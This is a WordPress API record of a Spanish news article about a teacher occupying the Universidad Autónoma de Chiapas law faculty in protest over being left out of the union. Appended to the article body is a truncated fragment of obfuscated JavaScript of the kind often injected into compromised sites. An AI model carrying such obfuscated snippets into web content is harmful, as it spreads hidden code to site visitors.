{"id":6395,"date":"2022-11-05T02:59:47","date_gmt":"2022-11-05T02:59:47","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=6395"},"modified":"2022-11-05T02:59:48","modified_gmt":"2022-11-05T02:59:48","slug":"toman-facultad-de-derecho-de-la-unach","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=6395","title":{"rendered":"Toman facultad de derecho de la Unach"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/WhatsApp-Image-2022-11-04-at-4.51.15-PM-1024x576.jpeg\" alt=\"\" class=\"wp-image-6396\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/WhatsApp-Image-2022-11-04-at-4.51.15-PM-1024x576.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/WhatsApp-Image-2022-11-04-at-4.51.15-PM-300x169.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/WhatsApp-Image-2022-11-04-at-4.51.15-PM-768x432.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/WhatsApp-Image-2022-11-04-at-4.51.15-PM.jpeg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/Corresponsal<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas.- M\u00e1s de mil 600 alumnos y 60 entre docentes y administrativos no pudieron acceder a las instalaciones de la Facultad de Derecho de la Universidad Aut\u00f3noma de Chiapas (Unach), ya que la docente Mar\u00eda Sara Ram\u00edrez Mazariegos, acompa\u00f1ada de integrantes de la Alianza del Autotransporte, tom\u00f3 las instalaciones debido a que el sindicato no la reconoce como parte del gremio y considera se trata de una injusticia laboral.<\/p>\n\n\n\n<p>&#8220;El d\u00eda de hoy me veo en la penosa necesidad de tomar el inmueble que ocupa la Facultad de Derecho en protesta a la violaci\u00f3n de mis derechos laborales. En negarme la oportunidad de tener seguridad laboral. Puesto que en el a\u00f1o 2016, el sindicato otorg\u00f3 horas temporales a varios docentes que inclusive ingresaron con fecha posterior a la suscrita y desde entonces me he dirigido a las autoridades universitarias y sindicales buscando seguridad laboral&#8221;, justific\u00f3 en un comunicado Mar\u00eda Sara Ram\u00edrez.<\/p>\n\n\n\n<p>Y es que denunci\u00f3 que el pasado 28 de octubre del presente a\u00f1o se llev\u00f3 a cabo la sindicalizaci\u00f3n de 100 trabajadores docentes de la Unach y qued\u00f3 excluida de dicho beneficio que por derecho le corresponde, pues desde su ingreso en 2014 ha sido organizadora de diversos eventos acad\u00e9micos, adem\u00e1s de contribuir de muchas formas en beneficio de esa instituci\u00f3n.<\/p>\n\n\n\n<p>\u201cSe\u00f1or Rector 4 horas labores no ser\u00e1n suficientes en las dos semanas de diciembre y en las 6 semanas de verano pues una semana tiene 7 d\u00edas y los 98 pesos de salario divididos en 3 comidas resultan insuficientes\u201d, cita en un escrito entregado a la Prensa.<\/p>\n\n\n\n<p>Desde su ingreso en 2014 ha organizado diversos eventos acad\u00e9micos, &#8220;adem\u00e1s de contribuir de muchas formas en beneficio de esta instituci\u00f3n&#8221;, y ahora la instituci\u00f3n no la reconoce como una de las catedr\u00e1ticas con mejor presencia.<\/p>\n\n\n\n<p>Hasta el cierre de la edici\u00f3n, la docente continuaba al interior, acompa\u00f1ada de un a beb\u00e9 que tiene, la cual est\u00e1 en riesgo de salud ante las bajas temperaturas que se han presentado en las \u00faltimas horas.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/Corresponsal San Crist\u00f3bal de Las Casas.- M\u00e1s de mil 600 alumnos y 60 entre docentes y administrativos no pudieron acceder a las instalaciones de la Facultad de Derecho de la Universidad Aut\u00f3noma de Chiapas (Unach), ya que la docente Mar\u00eda Sara Ram\u00edrez Mazariegos, acompa\u00f1ada de integrantes de la Alianza del Autotransporte, tom\u00f3 las instalaciones &hellip;<\/p>\n","protected":false},"author":2,"featured_media":6396,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-6395","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6395","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6395"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6395\/revisions"}],"predecessor-version":[{"id":6397,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6395\/revisions\/6397"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/6396"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6395"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=6395"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=6395"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}